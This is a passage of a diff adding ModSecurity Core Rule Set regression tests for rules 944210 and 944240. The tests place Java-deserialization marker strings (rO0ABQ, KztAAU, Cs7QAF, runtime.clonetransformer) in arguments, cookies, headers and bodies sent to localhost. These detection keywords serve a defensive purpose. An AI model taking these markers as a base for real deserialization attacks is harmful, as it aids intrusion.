rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"rO0ABQ\": \"test\"}" + output: + log_contains: "id \"944210\"" + - test_title: 944210-13 + desc: "Content-Type multipart/form-data json arg name includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"rO0ABQ": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-14 + desc: "Content-Type multipart/form-data json arg value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"rO0ABQ": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-15 + desc: "Content-Type multipart/form-data XML element value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + rO0ABQ + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-16 + desc: "Content-Type multipart/form-data XML element value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + rO0ABQ + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-17 + desc: "Argument test includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=KztAAU" + output: + log_contains: "id \"944210\"" + - test_title: 944210-18 + desc: "Argument name includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "KztAAU=test" + output: + log_contains: "id \"944210\"" + - test_title: 944210-19 + desc: "Cookie test includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=KztAAU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-20 + desc: "Cookie name includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: KztAAU=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-21 + desc: "Request header test includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: KztAAU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-22 + desc: "XML element includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944210\"" + - test_title: 944210-23 + desc: "XML attribute name includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944210\"" + - test_title: 944210-24 + desc: "XML attribute value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-25 + desc: "XML element value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "KztAAU" + output: + log_contains: "id \"944210\"" + - test_title: 944210-26 + desc: "Nested XML element value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "KztAAU" + output: + log_contains: "id \"944210\"" + - test_title: 944210-27 + desc: "Content-Type text/plain includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=KztAAU" + output: + log_contains: "id \"944210\"" + - test_title: 944210-28 + desc: "Content-Type application/json arg value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"KztAAU\"}" + output: + log_contains: "id \"944210\"" + - test_title: 944210-29 + desc: "Content-Type application/json arg name includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"KztAAU\": \"test\"}" + output: + log_contains: "id \"944210\"" + - test_title: 944210-30 + desc: "Content-Type multipart/form-data json arg name includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"KztAAU": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-31 + desc: "Content-Type multipart/form-data json arg value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"KztAAU": "test\} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-32 + desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + KztAAU + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-33 + desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + KztAAU + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-34 + desc: "Argument test includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Cs7QAF" + output: + log_contains: "id \"944210\"" + - test_title: 944210-35 + desc: "Argument name includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Cs7QAF=test" + output: + log_contains: "id \"944210\"" + - test_title: 944210-36 + desc: "Cookie test includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Cs7QAF + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-37 + desc: "Cookie name includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Cs7QAF=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-38 + desc: "Request header test includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Cs7QAF + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-39 + desc: "XML element includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944210\"" + - test_title: 944210-40 + desc: "XML attribute name includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944210\"" + - test_title: 944210-41 + desc: "XML attribute value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-42 + desc: "XML element value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Cs7QAF" + output: + log_contains: "id \"944210\"" + - test_title: 944210-43 + desc: "Nested XML element value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Cs7QAF" + output: + log_contains: "id \"944210\"" + - test_title: 944210-44 + desc: "Content-Type text/plain includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Cs7QAF" + output: + log_contains: "id \"944210\"" + - test_title: 944210-45 + desc: "Content-Type application/json arg value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Cs7QAF\"}" + output: + log_contains: "id \"944210\"" + - test_title: 944210-46 + desc: "Content-Type application/json arg name includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Cs7QAF\": \"test\"}" + output: + log_contains: "id \"944210\"" + - test_title: 944210-47 + desc: "Content-Type multipart/form-data json arg name includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"Cs7QAF": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-48 + desc: "Content-Type multipart/form-data json arg value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"Cs7QAF": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-49 + desc: "Content-Type multipart/form-data XML element value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + Cs7QAF + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-50 + desc: "Content-Type multipart/form-data XML element value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + Cs7QAF + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml new file mode 100644 index 000000000..cbdcd2fb1 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml @@ -0,0 +1,1791 @@ +--- +meta: + author: "spartantri" + enabled: true + name: "944240.yaml" + description: "Positive tests for rule 944240" +tests: + - test_title: 944240-0 + desc: "Argument test includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.clonetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-1 + desc: "Argument name includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.clonetransformer=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-2 + desc: "Cookie test includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.clonetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-3 + desc: "Cookie name includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.clonetransformer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-4 + desc: "Request header test includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: 